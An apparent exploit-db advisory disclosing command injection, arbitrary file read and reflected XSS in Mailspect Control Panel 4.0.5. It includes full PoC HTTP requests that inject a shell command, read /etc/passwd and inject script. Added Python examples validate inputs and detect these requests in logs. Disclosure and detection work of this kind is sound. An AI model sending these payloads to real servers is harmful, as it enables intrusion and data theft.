Mailspect Control Panel 4.0.5 – Multiple Vulnerabilities

  • Author: Onur Alanbel (BGA)
    Date: 2014-06-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33887/
  • Document Title:
    ============
    Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
    
    Release Date:
    ===========
    June 21, 2014
    
    Product & Service Introduction:
    ========================
    Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched 
    in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
    
    Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quarantine Solution and Mail Filter. Subsequently, 
    the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-PROT, Mailshell, and Sophos and built-in 
    content filters and reputation engines.
    
    Abstract Advisory Information:
    =======================
    BGA Team discovered one remote code execution, two arbitrary file read and one cross-site scripting vulnerability in the Mailspect Control 
    Panel 4.0.5 web application.
    
    Vulnerability Disclosure Timeline:
    =========================
    May 4, 2014	:	Contact with Vendor
    May 16, 2014	:	Vendor Response
    June 21, 2014	:	Public Disclosure
    
    Discovery Status:
    =============
    Published
    
    Affected Product(s):
    ===============
    Multilayered Email Security & Archive for Gateways, MTA's & Servers
    Product: Mailspect Control Panel 4.0.5
    Other versions may be affected. 
    
    Exploitation Technique:
    ==================
    RCE:	Remote, Authenticated
    AFR:	Remote, Authenticated
    XSS:	Remote, Unauthenticated
    
    Severity Level:
    ===========
    High
    
    Technical Details & Description:
    ========================
    1. Sending a POST request to "/system_module.cgi" with the config_version_cmd parameter set to a Linux command group such as "whoami > 
    /tmp/who; /usr/local/MPP/mppd -v" stores that value in the configuration; the injected command then runs as soon as 
    "status_info.cgi?group=default" is requested (a plain GET, or simply visiting the page).
    Other parameters with the suffix "_cmd" are probably vulnerable as well.
    
    2. Sending a GET request to "/monitor_logs_ctl.cgi" with the log_dir parameter set to "/" and the log_file parameter set to an arbitrary 
    file name such as "/etc/passwd" discloses that file's contents.
    
    3. Sending a POST request to "/monitor_manage_logs.cgi" with the log_file parameter set to an arbitrary file name such as "/etc/passwd" 
    discloses that file's contents.
    
    4. Sending a request to "/login.cgi" (see PoC request 4 below) with the login parameter set to "></script>js to be executed<script/> 
    causes the injected JavaScript to execute in the victim's browser (reflected cross-site scripting).
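
    Because the vendor is not patching the RCE and AFR issues (see Solution Fix & Patch), a compensating control has to live in front of the CGI scripts. The following is an added example, not Mailspect code: it shows the two checks a maintainer would apply to the "_cmd" configuration values (finding 1) and to the log_dir/log_file parameters (findings 2 and 3). Python stands in for the product's CGI language, and the LOG_ROOT and CMD_ROOT directories are assumptions taken from the paths in the PoC request.

```python
import os
import re
import shlex
import subprocess

# Assumed roots for this example; the real product reads its own values from its config.
LOG_ROOT = "/var/log/MPP"       # the only directory the log viewers may read from
CMD_ROOT = "/usr/local/MPP"     # the only place a *_cmd value may point into
SHELL_META = re.compile(r"[;&|`$<>(){}\r\n]")

def safe_log_path(log_dir, log_file, root=LOG_ROOT):
    """Resolve root/log_dir/log_file and return it only if it stays inside root.

    os.path.join discards everything before an absolute component, so log_dir="/"
    or log_file="/etc/passwd" would escape on their own; realpath also folds "..",
    which is why containment is checked on the resolved result, not the inputs.
    """
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, log_dir, log_file))
    if candidate == root or not candidate.startswith(root + os.sep):
        return None
    return candidate

def safe_command(value, root=CMD_ROOT):
    """Turn a *_cmd config value into an argv list, or return None.

    No shell ever sees the value: metacharacters are rejected outright, the value
    is tokenised with shlex, and the executable must live under root, so a value
    like "whoami > /tmp/who; /usr/local/MPP/mppd -v" cannot smuggle a second command.
    """
    if SHELL_META.search(value):
        return None
    try:
        argv = shlex.split(value)
    except ValueError:          # unbalanced quotes
        return None
    if not argv:
        return None
    exe = os.path.realpath(argv[0])
    if not exe.startswith(os.path.realpath(root) + os.sep):
        return None
    return [exe] + argv[1:]

def run_config_command(value):
    """Execute a validated *_cmd value without a shell; raises on rejected input."""
    argv = safe_command(value)
    if argv is None:
        raise ValueError("rejected command value")
    return subprocess.run(argv, capture_output=True, text=True, check=False)
```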
    
    Proof of Concept (PoC):
    ==================
    1. Proof of Concept RCE Request:
    
    POST /system_module.cgi HTTP/1.1
    Host: 192.168.41.142:20001
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.41.142:20001/system_module.cgi?group=default
    Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1282
     
    post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
    
    2. Proof of Concept AFR Request 1:
    
    GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
    Host: 192.168.41.142:20001
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
    Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
    Connection: keep-alive 
    
    3. Proof of Concept AFR Request 2:
    
    POST /monitor_manage_logs.cgi HTTP/1.1
    Host: 192.168.41.142:20001
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
    Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 85
     
    group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
    
    4. Proof of Concept XSS Request:
    
    GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
    Host: 192.168.41.142:20001
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive 
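
    With the endpoints above staying unpatched, the four PoC requests are also a detection opportunity. The following added example (not part of the advisory) turns them into log-review logic: classify() labels one request from its method, path and decoded parameters, and scan_access_log() runs it over Common Log Format lines. The sample lines are constructed from the PoC requests, and the client address and log format are assumptions; POST bodies are not in an access log, so the RCE and AFR-2 checks need request bodies from a reverse proxy or WAF.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: client ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Endpoints from the advisory and the parameters that name a file to read
FILE_PARAMS = {"/monitor_logs_ctl.cgi": ("log_file", "log_dir"),
               "/monitor_manage_logs.cgi": ("log_file",)}
SHELL_META = re.compile(r"[;&|`$<>]")
MARKUP = re.compile("[<>\"']")

def classify(method, path, params):
    """Return finding labels for one request; params maps name -> decoded value,
    as a reverse proxy or WAF would supply for GET query strings and POST bodies alike."""
    findings = []
    for name in FILE_PARAMS.get(path, ()):
        value = params.get(name, "")
        if value.startswith("/") or ".." in value.split("/"):
            findings.append(f"AFR: {name}={value!r} leaves the log directory")
    if path == "/system_module.cgi" and method == "POST":
        for name, value in params.items():
            if name.endswith("_cmd") and SHELL_META.search(value):
                findings.append(f"RCE: {name} carries shell metacharacters")
    if path == "/login.cgi" and MARKUP.search(params.get("login", "")):
        findings.append("XSS: login parameter contains markup characters")
    return findings

def scan_access_log(lines):
    """Run classify() over access-log lines; only GET query strings are visible here."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])   # parse_qs percent-decodes the values
        params = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        findings = classify(m["method"], url.path, params)
        if findings:
            hits.append((m["ip"], url.path, findings))
    return hits

# Constructed sample lines modelled on the PoC requests (not a real capture)
SAMPLE_LOG = [
    '192.168.41.1 - - [21/Jun/2014:10:00:01 +0300] "GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50 HTTP/1.1" 200 1842',
    '192.168.41.1 - - [21/Jun/2014:10:00:02 +0300] "GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1" 200 511',
    '192.168.41.1 - - [21/Jun/2014:10:00:03 +0300] "GET /monitor_logs_ctl.cgi?log_file=mppd.log&log_dir=&mode=tail&lines=50 HTTP/1.1" 200 9032',
]
```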
    
    Solution Fix & Patch:
    ================
    XSS will be patched in version 4.0.7.
    There will be no patch for the RCE and AFR vulnerabilities, as stated in the vendor's reply.
    
    Security Risk:
    ==========
    The risk of the vulnerabilities above is estimated as high.
    
    Credits & Authors:
    ==============
    Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
    
    Disclaimer & Information:
    ===================
    The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or 
    implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any 
    case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
    			
    Domain:	www.bga.com.tr/advisories.html
    Social:		twitter.com/bgasecurity
    Contact:	bilgi@bga.com.tr
    	
    Copyright © 2014 | BGA Security